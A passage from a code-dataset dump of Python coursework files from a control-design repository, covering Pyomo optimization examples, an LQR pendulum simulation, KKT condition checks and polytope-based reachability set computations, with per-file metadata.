"text": "# use Pyomo to solve optimization problems \n# linear, quadratic, nonlinear, mixed-integer \n\nimport pyomo.environ as pyo \n\n# %% linear programming \nmodel = pyo.ConcreteModel()\nmodel.x = pyo.Var()\nmodel.y = pyo.Var()\nmodel.z = pyo.Var()\n\nmodel.Obj = pyo.Objective(expr = model.x + model.y + model.z)\nmodel.cons1 = pyo.Constraint(expr = -2<= model.x)\nmodel.cons2 = pyo.Constraint(expr = -1<= model.y)\nmodel.cons3 = pyo.Constraint(expr = -3<= model.z)\nmodel.cons4 = pyo.Constraint(expr = model.x - model.y + model.z >= 4)\n\nsolver = pyo.SolverFactory('cbc')\nresult = solver.solve(model)\n\n# print('x*_solver = ',pyo.value(model.x))\n# print('y*_solver = ',pyo.value(model.y))\n# print('z*_solver = ',pyo.value(model.z))\n# print('opt_value = ',pyo.value(model.Obj))\n\n\n# %% nonlinear programming \nimport numpy as np \n\nmodel = pyo.ConcreteModel()\nmodel.z1 = pyo.Var()\nmodel.z2 = pyo.Var()\nmodel.Obj = pyo.Objective(expr = 3 * pyo.sin(-2*np.pi * model.z1) + 2* model.z1 + 4 + pyo.cos(2*np.pi*model.z2) + model.z2)\n\nmodel.cons1 = pyo.Constraint(expr = (-1,model.z1,1))\nmodel.cons2 = pyo.Constraint(expr = (-1,model.z2,1))\n# model.cons2 = pyo.Constraint(expr = -1<= model.z2 <= 1)\n\n\nresults = pyo.SolverFactory('ipopt').solve(model)\n\n# print('zOpt = ',[pyo.value(model.z1),pyo.value(model.z2)])\n# print('JOpt = ', pyo.value(model.Obj))\n\nz1 = []\nz2 = []\nJ = []\nfor _ in range(10):\n z1_init = np.random.uniform(low = -1.0,high = 1.0)\n z2_init = np.random.uniform(low=-1.0, high = 1.0)\n model = pyo.ConcreteModel()\n model.z1 = pyo.Var(initialize = z1_init)\n model.z2 = pyo.Var(initialize = z2_init)\n model.obj = pyo.Objective(expr =3*pyo.sin(-2*np.pi*model.z1) + 2*model.z1 + 4 + pyo.cos(2*np.pi*model.z2) + model.z2)\n model.cons1 = pyo.Constraint(expr = (-1,model.z1,1))\n model.cons2 = pyo.Constraint(expr = (-1,model.z2,1))\n\n results = pyo.SolverFactory('ipopt').solve(model)\n z1.append(pyo.value(model.z1))\n z2.append(pyo.value(model.z2))\n J.append(pyo.value(model.obj))\n\n# print('z1Opt = ',z1)\n\nimport matplotlib.pyplot as plt \n\nz1_opt = z1 \nz2_opt = z2 \nfig, ax = plt.subplots(figsize = (15,15))\nz = np.linspace(-1,1,100)\nz1,z2 = np.meshgrid(z,z)\nC = 3* np.sin(-2* np.pi * z1 ) + 2*z1 + 4+ np.cos(2* np.pi* z2) + z2\ncontour = ax.contour(z1,z2,C, cmap = plt.cm.RdBu, vmin = abs(C).min(), vmax = abs(C).max(),)\nax.clabel(contour,fontsize = 10, inline =1)\nax.axis('square')\nax.scatter(z1_opt,z2_opt,c='r',marker ='o')\n# plt.show()\n\n# %% mixed integer programming \n\n# power plant problem \n\n# Horizon = 48 \n# T = np.array([t for t in range(Horizon)])\nT = 48\n\n# predicted demand\nd = np.array([100 + 50 * np.sin(t * 2*np.pi/24) for t in range(T)])\n\nN = 3\n# N = np.array([n for n in range(Nplant)])\n\nPmax = [100,50,25]\nPmin = [20,40,1]\nC = [10,20,20] \n\nmodel = pyo.ConcreteModel()\nmodel.N = pyo.Set(initialize = range(N))\nmodel.T = pyo.Set(initialize = range(T)) \n\n# production\nmodel.x = pyo.Var(model.N, model.T)\n\n# on/off \nmodel.u = pyo.Var(model.N, model.T, domain= pyo.Binary)\n\n# cost function \nmodel.cost = pyo.Objective(\n expr = sum(model.x[n,t]* C[n] for t in model.T for n in model.N),\n sense = pyo.minimize \n)\n\n# demand constraints \nmodel.demand = pyo.Constraint(\n model.T, rule = lambda model,t: sum(model.x[n,t] for n in range(N)) >= d[t]\n)\n\n# production constraints still confusing ???\nmodel.lb = pyo.Constraint(\n model.N, model.T, rule = lambda\n model, n, t: Pmin[n] * model.u[n,t] <= model.x[n,t]\n)\n\n\nmodel.ub = 
pyo.Constraint(\n model.N, model.T, rule = lambda\n model,n,t: Pmax[n] * model.u[n,t] >= model.x[n,t]\n)\n\nresult = pyo.SolverFactory('glpk').solve(model) \n# ---------pay attention to the solver ------------\n\nunit1 = [pyo.value(model.x[0,0])]\nunit2 = [pyo.value(model.x[1,0])]\nunit3 = [pyo.value(model.x[2,0])]\n\nfor t in range(T):\n unit1.append(pyo.value(model.x[0,t]))\n unit2.append(pyo.value(model.x[1,t]))\n unit3.append(pyo.value(model.x[2,t]))\nplt.figure(figsize = (15,15))\nplt.step(unit1,'b')\nplt.step(unit2,'g')\nplt.step(unit3,'r')\n# plt.show()\n\n\n# %% Quadratic programming \n\nx0 = 10 \n\nmodel = pyo.ConcreteModel()\n\nmodel.idxx = pyo.Set(initialize = [0,1])\nmodel.idxu = pyo.Set(initialize = [0,1])\nmodel.x = pyo.Var(model.idxx)\nmodel.u = pyo.Var(model.idxu)\n\nmodel.obj = pyo.Objective(\n expr = 0.5* (model.x[0]**2 + model.x[1]**2 + model.u[0]**2 + model.u[1]**2),\n sense = pyo.minimize \n)\n\nmodel.cons1 = pyo.Constraint(expr = model.x[0] == 0.5*x0+ model.u[0])\nmodel.cons2 = pyo.Constraint(expr = model.x[1] == 0.5*model.x[0]+ model.u[1])\nmodel.cons3 = pyo.Constraint(expr = (2,model.x[0],5))\nmodel.cons4 = pyo.Constraint(expr = (-2,model.x[1],5))\nmodel.cons5 = pyo.Constraint(expr = (-1,model.u[0],1) )\nmodel.cons6 = pyo.Constraint(expr = (-1,model.u[1],1))\n\nresult = pyo.SolverFactory('ipopt').solve(model)\n\nprint('x* = ',[model.x[i]() for i in model.idxx])\nprint('opt_value = ', model.obj())\n"
},
{
"alpha_fraction": 0.5312907695770264,
"alphanum_fraction": 0.5704041719436646,
"avg_line_length": 20.30555534362793,
"blob_id": "d0651916e9d71b321a8a9e0d6eff90c253ba2fef",
"content_id": "f1e11bf2a05c9c5caa18939ebcd379464babc29a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1534,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 72,
"path": "/py_files/Lab6_LQR.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nfrom scipy.integrate import solve_ivp\nimport numpy as np\nfrom scipy.linalg import inv\nfrom scipy import linalg\n\nimport scipy.signal\n# import scipy.linalg\n\nTs = .1\na0 = -2.5\na1 = .05\nb0 = .25\nAc = np.array([0, 1, -a0, -a1]).reshape((2, 2))\nBc = np.array([0, b0]).reshape((2, 1))\n\nCc = np.zeros((1, 2))\nDc = np.zeros((1, 1))\n\nAd, Bd, Cd, Dd, dt = scipy.signal.cont2discrete((Ac, Bc, Cc, Dc\n ), Ts)\n\nQ = np.diag([1, 0])\nR = 1\n\n\ndef dlqr(A, B, Q, R):\n P = scipy.linalg.solve_discrete_are(A, B, Q, R)\n K = inv(B.T @ P @ B + R) @ (B.T@P @ A)\n eigVals, eigVecs = linalg.eig(A - B @ K)\n return K, P, eigVals\n\n\nKlqr, P, eigvals = dlqr(Ad, Bd, Q, R)\n\n\nx0 = np.array([np.pi/4, 0])\nTf = 10\nT0 = 0\n\n\n# def continuous_dyn(t, x, u):\n# theta, theta_dot = x\n# return [theta_dot, -a0*np.sin(theta) - a1*theta_dot + b0*np.cos(theta)*u]\n\n\ndef continuous_dyn_with_controller(t, x, klqr):\n theta, theta_dot = x\n k1, k2 = klqr\n u = -k1 * theta - k2*theta_dot\n return [theta_dot, -a0 * np.sin(theta) - a1*theta_dot + b0*u*np.cos(theta)]\n\n\nsol = solve_ivp(\n continuous_dyn_with_controller, [T0, Tf], x0,\n t_eval=np.arange(0, Tf, Ts),\n args=(Klqr)\n # it is not flatten here!!----------\n)\nu = [-Klqr @ sol.y[:, i] for i in range(len(sol.y[0, :]))]\n\n\nplt.subplot(3, 1, 1)\nplt.plot(sol.y[0, :])\nplt.ylabel('theta')\nplt.subplot(312)\nplt.plot(sol.y[1, :])\nplt.ylabel('theta_dot')\nplt.subplot(313)\nplt.plot(u, 'r')\nplt.ylabel('u')\nplt.show()\n"
},
{
"alpha_fraction": 0.49100178480148315,
"alphanum_fraction": 0.5334054231643677,
"avg_line_length": 30.180723190307617,
"blob_id": "8acbf2b0ecea7e9a279c846f477a3c5b5bf3a3d2",
"content_id": "5ac9397375a2d27c82b5d06ce4f4d0c03d4eba8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12947,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 415,
"path": "/py_files/HW3_optimization2.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# Linear and quadratic programming \nimport pyomo.environ as pyo\nimport numpy as np\ndef check_solver_status(model, results):\n from pyomo.opt import SolverStatus, TerminationCondition\n if (results.solver.status == SolverStatus.ok) and (results.solver.termination_condition == TerminationCondition.optimal):\n print('========================================================================================')\n print('================ Problem is feasible and the optimal solution is found ==================')\n # print('z1 optimal=', pyo.value(model.z[1]))\n # print('z2 optimal=', pyo.value(model.z[2]))\n print('z1 optimal=', pyo.value(model.z1))\n print('z2 optimal=', pyo.value(model.z2)) \n print('optimal value=', pyo.value(model.obj))\n print('========================================================================================')\n bound = True\n feas = True\n # zOpt = np.array([pyo.value(model.z[1]), pyo.value(model.z[2])])\n zOpt = np.array([pyo.value(model.z1), pyo.value(model.z2)])\n\n JOpt = pyo.value(model.obj)\n elif (results.solver.termination_condition == TerminationCondition.infeasible):\n print('========================================================')\n print('================ Problem is infeasible ==================')\n print('========================================================')\n feas = False\n zOpt = []\n JOpt = []\n if (results.solver.termination_condition == TerminationCondition.unbounded):\n print('================ Problem is unbounded ==================')\n bound = False\n else:\n bound = True\n \n else:\n if (results.solver.termination_condition == TerminationCondition.unbounded):\n print('================ Problem is unbounded ==================')\n bound = False\n feas = True\n zOpt = []\n JOpt = np.inf\n else:\n bound = True\n feas = True\n zOpt = []\n JOpt = np.inf\n \n return feas, bound, zOpt, JOpt\n\ndef LPQPa():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = -5* m.z1-7* m.z2)\n m.cons1 = pyo.Constraint(expr = -3 * m.z1 + 2*m.z2 <= 30)\n m.cons2 = pyo.Constraint(expr = -2 * m.z1 + m.z2 <= 12)\n m.cons3 = pyo.Constraint(expr = m.z1 >=0)\n m.cons4 = pyo.Constraint(expr = m.z2 >=0)\n\n sol = pyo.SolverFactory('cbc').solve(m)\n return check_solver_status(m,sol)\n# print(LPQPa())\n\ndef LPQPb():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = 3*m.z1 + m.z2)\n\n m.cons1 = pyo.Constraint(expr = -1*m.z1 -1*m.z2 <=1)\n m.cons2 = pyo.Constraint(expr = 3*m.z1 + 2 *m.z2 <=12)\n m.cons3 = pyo.Constraint(expr = 2*m.z1 + 3*m.z2 <=3)\n m.cons4 = pyo.Constraint(expr = -2*m.z1 + 3*m.z2 >=9)\n m.cons5 = pyo.Constraint(expr = m.z1 >=0)\n m.cons6 = pyo.Constraint(expr = m.z2 >=0)\n\n res = pyo.SolverFactory('cbc').solve(m)\n return check_solver_status(m,res)\n\n# print(LPQPb())\n\ndef LPQPc():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.t11 = pyo.Var()\n m.t12 = pyo.Var()\n m.tinf = pyo.Var()\n m.obj = pyo.Objective(expr = m.t11 + m.t12 + m.tinf)\n\n m.cons1 = pyo.Constraint(expr = 3*m.z1 + 2*m.z2 <= -3)\n m.cons2 = pyo.Constraint(expr = (0,m.z1,2))\n m.cons3 = pyo.Constraint(expr = (-2,m.z2,3))\n\n m.cons4 = pyo.Constraint(expr = m.tinf >= m.z1 -2)\n m.cons5 = pyo.Constraint(expr = m.tinf >= -(m.z1 -2))\n m.cons6 = pyo.Constraint(expr = m.tinf >= m.z2)\n m.cons7 = pyo.Constraint(expr = m.tinf >= -m.z2)\n\n m.cons8 = pyo.Constraint(expr = m.t11 >= m.z1)\n m.cons9 = pyo.Constraint(expr = m.t11 >= -m.z1)\n m.cons10 = pyo.Constraint(expr = m.t12 >= 
m.z2+5)\n m.cons11 = pyo.Constraint(expr = m.t12 >= -(m.z2+5))\n\n res = pyo.SolverFactory('cbc').solve(m)\n return check_solver_status(m,res)\n\n# print(LPQPc())\n\ndef LPQPd():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = m.z1**2 + m.z2**2)\n m.cons1 = pyo.Constraint(expr = m.z1 <= -3)\n m.cons2 = pyo.Constraint(expr = m.z2<= 4)\n m.cons3 = pyo.Constraint(expr = 4*m.z1 + 3*m.z2 <=0)\n\n res = pyo.SolverFactory('ipopt').solve(m)\n return check_solver_status(m,res)\n\n# print(LPQPd())\n\ndef NLP1(z0 = []):\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(initialize = z0[0])\n m.z2 = pyo.Var(initialize = z0[1])\n m.obj = pyo.Objective(\n expr = 3*pyo.sin(-2*np.pi*m.z1) + 2*m.z1 +4+ pyo.cos(2*np.pi*m.z2)+ m.z2\n )\n\n m.cons1 = pyo.Constraint(expr = (-1,m.z1,1))\n m.cons2 = pyo.Constraint(expr = (-1,m.z2,1))\n res = pyo.SolverFactory('ipopt').solve(m)\n\n return [m.z1(),m.z2(),m.obj()]\n\n# print(NLP1())\n\nz1 = []\nz2 = []\nJ = []\nfor _ in range(0):\n z1_init = np.random.uniform(-1,1)\n z2_init = np.random.uniform(-1,1)\n z1Opt,z2Opt,JOpt = NLP1([z1_init,z2_init])\n\n z1.append(z1Opt)\n z2.append(z2Opt)\n J.append(JOpt)\n\n# print('z1Opt = ',z1)\n# print('z2Opt = ',z2)\n# print('JOpt = ',J)\n\nz1_opt = z1\nz2_opt = z2\n\nimport matplotlib.pyplot as plt \n\nif False:\n fig,ax = plt.subplots(figsize = (15,15))\n z = np.linspace(-1,1,100)\n z1_grid,z2_grid = np.meshgrid(z,z)\n C = 3* np.sin(-2* np.pi * z1_grid) + 2*z1_grid + 4+ np.cos(2* np.pi* z2_grid) + z2_grid\n contour = plt.contour(\n z1_grid,z2_grid,C,\n cmap=plt.cm.RdBu,\n vmin = abs(C).min(),vmax = abs(C).max(),\n )\n ax.clabel(contour,fontsize = 10,inline=1)\n ax.axis('square')\n ax.scatter(z1_opt,z2_opt,c ='b')\n plt.show()\n\nif False:\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure(figsize=(12,9))\n ax = Axes3D(fig)\n z = np.linspace(-1,1,100)\n z1_grid,z2_grid = np.meshgrid(z,z)\n C = 3* np.sin(-2* np.pi * z1_grid) + 2*z1_grid + 4+ np.cos(2* np.pi* z2_grid) + z2_grid\n ax.plot_surface(z1_grid,z2_grid,C,rstride=1,cstride =1,cmap='viridis')\n ax.set_xlabel('z1')\n ax.set_ylabel('z2')\n ax.set_zlabel('cost')\n plt.show()\n\n# %% P3 NLP II\n\ndef NLP2(z0 = []):\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(initialize = z0[0])\n m.z2 = pyo.Var(initialize = z0[1])\n m.obj = pyo.Objective(\n expr = pyo.log(1+m.z1**2) - m.z2\n )\n m.cons1 = pyo.Constraint(\n expr = -(1+m.z1**2)**2 + m.z2**2 ==4\n )\n res = pyo.SolverFactory('ipopt').solve(m)\n\n return [m.z1(),m.z2(),m.obj()]\n\n# print(NLP2([0,0]))\nz1 = []\nz2 = []\nJ = []\nfor _ in range(0):\n z1_init = np.random.uniform(-1,1)\n # z2_init = np.random.uniform(-1,1)\n # -----------pay attention to z2_init here---------\n z2_init = np.sqrt( 4+ (1+z1_init**2)**2)\n z1Opt,z2Opt,JOpt = NLP2([z1_init,z2_init])\n\n z1.append(z1Opt)\n z2.append(z2Opt)\n J.append(JOpt)\n# print('z1Opt = ',z1)\n# print('z2Opt = ',z2)\n# print('JOpt = ',J)\n\nif False:\n fig,ax = plt.subplots(figsize = (15,15))\n z =np.linspace(-10,10,100)\n z1_grid, z2_grid = np.meshgrid(z,z)\n C = np.log(1 + z1_grid**2) - z2_grid\n CS = ax.contour(\n z1_grid,z2_grid,C,\n cmap = plt.cm.RdBu,\n vmin = abs(C).min(),vmax = abs(C).max()\n )\n ax.clabel(CS,fontsize=12,inline=1)\n ax.axis('square')\n plt.show()\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nif False:\n fig = plt.figure(figsize=(12,9))\n ax = Axes3D(fig)\n z = np.linspace(-10,10,100)\n z1_grid,z2_grid = np.meshgrid(z,z)\n C = np.log(1 + z1_grid**2) - z2_grid\n ax.plot_surface(z1_grid,z2_grid,C,rstride=1,cstride 
=1,cmap='viridis')\n ax.set_xlabel('z1')\n ax.set_ylabel('z2')\n ax.set_zlabel('cost')\n plt.show()\n\n\n# %% mixed integer problems \ndef MIPa():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(within =pyo.Integers)\n m.z2 = pyo.Var(within =pyo.Integers)\n\n m.obj = pyo.Objective(\n expr = -6*m.z1 -5*m.z2\n )\n\n m.cons1 = pyo.Constraint(expr = 1* m.z1 + 4*m.z2 <=16)\n m.cons2 = pyo.Constraint(expr = 6* m.z1 + 4*m.z2 <=28)\n m.cons3 = pyo.Constraint(expr = 2* m.z1 - 5*m.z2 <=6)\n m.cons4 = pyo.Constraint(expr = (0,m.z1,10))\n m.cons5 = pyo.Constraint(expr = (0,m.z2,10))\n\n res = pyo.SolverFactory('glpk').solve(m)\n return [m.z1(),m.z2(),m.obj()]\n\n# print(MIPa())\n\ndef MIPb():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.bin = pyo.Var(within = pyo.Binary)\n m.obj = pyo.Objective(expr = -m.z1-2*m.z2)\n\n m.cons1 = pyo.Constraint(expr = 3*m.z1 + 4*m.z2 <=12+m.bin*1e8)\n m.cons2 = pyo.Constraint(expr = 4*m.z1 + 3*m.z2 <=12+(1-m.bin)*1e8)\n # -----------pay attention to the trick here------------------------\n m.c2 = pyo.Constraint(expr = m.z1>=0)\n m.c3 = pyo.Constraint(expr = m.z2>=0)\n res = pyo.SolverFactory('glpk').solve(m)\n return [m.z1(),m.z2(),m.obj()]\n\n# print(MIPb())\n\n# %% KKT conditions\nfrom pyomo.opt import SolverStatus,TerminationCondition\n\ndef LPQPkkta():\n KKTsat = False\n Threshold = 1e-5\n\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = m.z1**2 + m.z2**2)\n m.c1 = pyo.Constraint(expr = m.z1 <=-3)\n m.c2 = pyo.Constraint(expr = m.z2 <=4)\n m.c3 = pyo.Constraint(expr = 4*m.z1 + 3*m.z2 <=0)\n \n\n m.dual = pyo.Suffix(direction = pyo.Suffix.IMPORT)\n\n res = pyo.SolverFactory('ipopt').solve(m)\n if res.solver.termination_condition is not TerminationCondition.optimal:\n KKTsat = False\n else:\n zOpt = np.array([m.z1(),m.z2()])\n A = np.array([1,0,0,1,4,3]).reshape((3,2))\n b = np.array([-3,4,0])\n # ---------------------don't reshape here ---------------------\n\n u = []\n for c in m.component_objects(pyo.Constraint,active = True):\n print (\"Constraint\", c)\n for index in c:\n print(m.dual[c[index]])\n u.append(m.dual[c[index]])\n\n u = np.asarray(u)\n \n for i in range(len(u)):\n if u[i] < Threshold and u[i] > -Threshold:\n u[i] =0\n\n x = A @ zOpt - b\n flag_ineq = np.any(np.all(x <= Threshold) or np.all(x <= -Threshold))\n # flag_ineq = np.any(np.all(A @ zOpt <= b + Threshold) or np.all(A@zOpt <= b -Threshold))\n flag_dual = np.all(u>=0)\n # flag_cs = np.all(np.multiply(u,x) < Threshold and np.all(np.multiply(u,x) > -Threshold))\n flag_cs = np.all(np.multiply(u,x)< Threshold) and np.all(np.multiply(u,x)> -Threshold)\n # ------------------- pay attention here ---------------------\n\n grad_lagrangian = [2*zOpt[0],2*zOpt[1]] + u.T @A\n for i, y in enumerate(grad_lagrangian):\n if y < Threshold and y > -Threshold:\n grad_lagrangian[i] = 0\n\n flag_grad = np.all(grad_lagrangian ==0)\n flags = [flag_ineq,flag_dual,flag_cs,flag_grad]\n flags = np.array(flags)\n if all(flags ==1):\n KKTsat = True\n else:\n KKTsat = False \n\n return KKTsat \n\n# print(LPQPkkta())\n\ndef NPLkkt(z0):\n KKTsat = True\n Threshold = 1e-5\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(initialize = z0[0])\n m.z2 = pyo.Var(initialize = z0[1])\n m.obj = pyo.Objective(\n expr = 3*pyo.sin(-2*np.pi*m.z1) + 2*m.z1+4+pyo.cos(2*np.pi*m.z2) + m.z2\n )\n # m.c1 = pyo.Constraint(expr = (-1,m.z1,1))\n # m.c2 = pyo.Constraint(expr = (-1,m.z2,1))\n # ------------------this constraint should only be expressed like this--------------------\n m.c11 = 
pyo.Constraint(expr = m.z1 <=1)\n m.c12 = pyo.Constraint(expr = -m.z1 <=1)\n m.c21 = pyo.Constraint(expr = m.z2 <=1)\n m.c22 = pyo.Constraint(expr = -m.z2 <=1)\n\n\n m.dual = pyo.Suffix(direction = pyo.Suffix.IMPORT)\n\n res = pyo.SolverFactory('ipopt').solve(m)\n zOpt = [m.z1(),m.z2()]\n\n if res.solver.termination_condition is not TerminationCondition.optimal:\n return False \n\n # A = np.array([1,0,-1,0,0,1,0,-1]).reshape((4,2))\n A = np.array([[1,0],[-1,0],[0,1],[0,-1]])\n b = np.array([1,1,1,1])\n\n u = []\n for c in m.component_objects(pyo.Constraint,active = True):\n for i in c:\n u.append(m.dual[c[i]])\n\n for i,ui in enumerate(u):\n if ui < Threshold and ui> -Threshold:\n u[i] = 0\n\n u = np.asarray(u)\n\n x = A @ zOpt -b \n flag_ineq = np.all(x <= Threshold)\n flag_dual = np.all(u >= 0)\n flag_cs = np.all(np.multiply(u,x)<Threshold) and np.all(np.multiply(u,x)>-Threshold)\n grad_lagrangian = [ -6*np.pi * np.cos(-2*np.pi*zOpt[0]) +2,-2*np.pi*np.sin(2*np.pi*zOpt[1])+1] + u.T @A\n\n for i, y in enumerate(grad_lagrangian):\n if y < Threshold and y > -Threshold:\n grad_lagrangian[i] = 0\n\n flag_grad = np.all(grad_lagrangian ==0)\n flags = [flag_ineq,flag_dual,flag_cs,flag_grad]\n flags = np.array(flags)\n if all(flags ==1):\n KKTsat = True\n else:\n KKTsat = False \n\n return KKTsat\n\nprint(NPLkkt([0,0]))\n\n\n\n "
},
{
"alpha_fraction": 0.41119980812072754,
"alphanum_fraction": 0.449987530708313,
"avg_line_length": 24.125391006469727,
"blob_id": "ec5db524eeeeabd800e3e7b99c469890948996c0",
"content_id": "b0120a055b86d340b810d09bf43f3a6bd1392fef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8018,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 319,
"path": "/py_files/reachability_class.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import polytope as pt\nimport numpy as np\nimport cvxpy as cp\nimport matplotlib.pyplot as plt\n\nA = np.array([[1, 0],\n [0, 1],\n [0, -1],\n [-1, 0]])\n\nb = np.array([[10],\n [10],\n [10],\n [10]])\n\nP = pt.Polytope(A,b)\nif False:\n fig, ax = plt.subplots(1,1)\n plt.rcParams['figure.figsize'] = [20, 20]\n P.plot(ax, color='r')\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n# reduce \nP = pt.reduce(P)\nprint(P)\n\n# HV conversion \nV=np.array([[10,10],[-10,10],[10,-10],[-10,-10]])\nP = pt.qhull(V)\nprint(P)\n\nV1 = pt.extreme(P)\nprint(V1)\n\n\n# Minkwoski sum of two Polytopes\ndef minkowski_sum(X,Y):\n v_sum = []\n if isinstance(X,pt.Polytope):\n X = pt.extreme(X) # make sure it is V version\n\n if isinstance(Y,pt.Polytope):\n Y = pt.extreme(Y)\n \n for i in range(X.shape[0]):\n for j in range(Y.shape[0]):\n v_sum.append(X[i,:]+Y[j,:])\n return pt.qhull(np.asarray(v_sum))\n\n\nP = np.array([[1, 0],\n [0, 1],\n [0, -1],\n [-1, 0]])\n\np = np.array([[6],\n [6],\n [6],\n [6]])\n\nQ = np.array([[1, 0],\n [0, 1],\n [0, -1],\n [-1, 0]])\n\nq = np.array([[2],\n [2],\n [2],\n [2]])\n\nPp = pt.Polytope(P, p)\nQq = pt.Polytope(Q, q)\n\np_sum = minkowski_sum(Pp, Qq)\n\nif False:\n fig, ax = plt.subplots(1,1)\n p_sum.plot(ax, color='b')\n Pp.plot(ax, color='r')\n Qq.plot(ax, color='g')\n ax.legend(['sum', 'P', 'Q'])\n ax.autoscale_view() \n ax.axis('equal')\n plt.show()\n\ndef projection(X,nx):\n V_sum = []\n V = pt.extreme(X)\n for i in range(V.shape[0]):\n V_sum.append(V[i,0:nx])\n return pt.qhull(np.asarray(V_sum))\n\nP = np.array([[1, 0, 0],\n [0, 1, 0 ],\n [0, -1, 0 ],\n [-1, 0, 0],\n [0,0,1],\n [0,0,-1]])\n\np = np.array([[6],\n [3],\n [3],\n [6],\n [10],\n [10]])\n\nPp = pt.Polytope(P, p)\n\nPProj = projection(Pp,2)\n# print(PProj)\n\n# %% N steps controllable sets to a given set \n\ndef precursor(Sset,A,Uset = pt.Polytope(),B = np.array([])):\n # see definition of Pre(S) in slides\n if not B.any(): # if B is nothing\n return pt.Polytope(Sset.A @ A ,Sset.b)\n else:\n tmp = minkowski_sum(Sset,pt.extreme(Uset) @ -B.T)\n return pt.Polytope(tmp.A @ A, tmp.b)\n\n# Example one step \nA = np.array([[1.5, 0],\n [1.0, -1.5]])\n\nB = np.array([[1.0], \n [0.0]])\n\nS = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[1], \n [1],\n [1],\n [1]]))\n\nU = pt.Polytope(np.array([[1.0], \n [-1.0]]),\n np.array([[5.0], \n [5.0]]))\nif False:\n preS = precursor(S, A, U, B)\n fig, ax = plt.subplots()\n S.plot(ax, color='b')\n #preS.intersect(S).plot(ax, color='r')\n preS.plot(ax, color='r')\n ax.legend(['S', 'Pre(S)'])\n plt.rcParams['figure.figsize'] = [10, 10]\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n# example in 10 steps \n# Example 10 steps \n\n\nN = 10 # number of steps\nK = {}\nPreS = precursor(S, A, U, B) #one step controllable to S\nfor j in range(N):\n K[j]= PreS #for j=0 one ste controllable\n PreS = precursor(K[j], A, U, B)\n\n\n# Plotting \nplt.clf()\nplt.cla()\nplt.close('all')\nif False:\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n S.plot(ax, color='b')\n K[0].plot(ax, color='g', alpha=0.1, linestyle='solid', linewidth=1, edgecolor=None) # K_0 is equivalent to Pre S\n K[1].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_1 two step controllable set \n K[2].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_2 three step controllable set \n K[3].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_3 \n K[4].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # 
K_4 \n K[N-1].plot(ax, color='b', alpha=0.1, linestyle='solid', linewidth=1) # K_5 \n ax.legend(['K0', 'K1', 'K2', 'K3', 'K4', 'KN-1'])\n\n plt.rcParams['figure.figsize'] = [10, 10]\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n\nK=np.array([[-0.1,-0.1]])\nAcl=A+B@K # x+=Ax+Bu but u=K*x-? x+=(A+BK)x\neig_val = np.linalg.eigvals(Acl)\nprint('Eigen Values are',eig_val,', if they are <0: ', np.all(eig_val<0))\n\nS = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[1], \n [1],\n [1],\n [1]]))\n\n# Input Constraints Hu*u<=Ku (umin=-5, umax=5)\nHu=np.array([[1.0],[-1.0]])\nku=np.array([[5.0], [5.0]])\n# recall U = pt.Polytope(Hu,ku)\n\n# if u has to be in U then Kx has to be in U -> (Hu*K)*x<=ku\n# U now become X constraints\nX = pt.Polytope(Hu@K,ku)\nSnew=S.intersect(X)\npreS = precursor(Snew, Acl)\n\nif False:\n fig, ax = plt.subplots()\n Snew.plot(ax, color='b')\n # X.plot(ax, color='g') unbounded X \n #preS.intersect(S).plot(ax, color='r')\n preS.plot(ax, color='r')\n ax.legend(['S', 'Pre(S)','X'])\n plt.rcParams['figure.figsize'] = [5, 5]\n ax.autoscale_view()\n ax.axis('equal')\n plt.title('Closed S')\n plt.show()\n\ndef max_pos_inv(A, S):\n maxIterations = 500\n # initialization\n Omega_i = S \n for i in range(maxIterations):\n # compute backward reachable set\n P = precursor(Omega_i, A)\n # intersect with the state constraints\n P = pt.reduce(P).intersect(Omega_i)\n if P == Omega_i:\n Oinf = Omega_i\n break\n else:\n Omega_i = P\n if i == maxIterations:\n converged = 0\n else:\n converged = 1\n return Oinf, converged\n\ndef max_cntr_inv(A,B,X,U):\n maxIterations = 500\n # initialization\n Omega0 = X \n for i in range(maxIterations):\n # compute backward reachable set\n P = precursor(Omega0, A, U, B)\n # intersect with the state constraints\n P = pt.reduce(P).intersect(Omega0)\n if P == Omega0:\n Cinf = Omega0\n break\n 